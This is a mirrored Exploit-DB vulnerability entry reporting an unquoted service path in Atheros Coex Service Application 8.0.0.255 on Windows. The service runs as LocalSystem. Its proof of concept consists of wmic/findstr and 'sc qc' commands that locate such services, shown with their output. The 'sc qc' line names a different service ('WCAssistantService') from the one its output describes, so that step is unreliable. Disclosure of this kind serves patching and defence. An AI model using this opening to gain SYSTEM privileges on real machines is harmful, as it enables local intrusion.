Atheros Coex Service Application 8.0.0.255 – ‘ZAtheros Bt&Wlan Coex Agent’ Unquoted Service Path - 体验盒子

作者： Isabel Lopez

日期： 2020-11-16

类别：

local

平台：

windows

来源：https://www.exploit-db.com/exploits/49053/

#Exploit Title: Atheros Coex Service Application 8.0.0.255 -'ZAtheros Bt&Wlan Coex Agent' Unquoted Service Path
#Exploit Author : Isabel Lopez
#Exploit Date: 2020-11-13
#Vendor Homepage : https://www.file.net/process/ath_coexagent.exe.html
#Link Software : https://www.boostbyreason.com/resource-file-9102-ath_coexagent-exe.aspx
#Tested on OS: Windows 8.1 (64bits)


# 1. Description
# Atheros Coex Service Application 8.0.0.255 has an unquoted service path.

# 2. PoC

C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /V "C:\Windows" | findstr /i /V """"

ZAtheros Bt&Wlan Coex Agent	ZAtheros Bt&Wlan Coex Agent	C:\Program Files (x86)\Bluethooth Suite\Aht_CoexAgent.exeAuto

C:\>sc qc WCAssistantService
[SC] QueryServiceConfig SUCCES

SERVICE_NAME: WCAssistantService
TYPE : 10WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL: 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Bluethooth Suite\Aht_CoexAgent.exe
LOAD_ORDER_GROUP :
TAG: 0
DISPLAY_NAME : ZAtheros Bt&Wlan Coex Agent
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem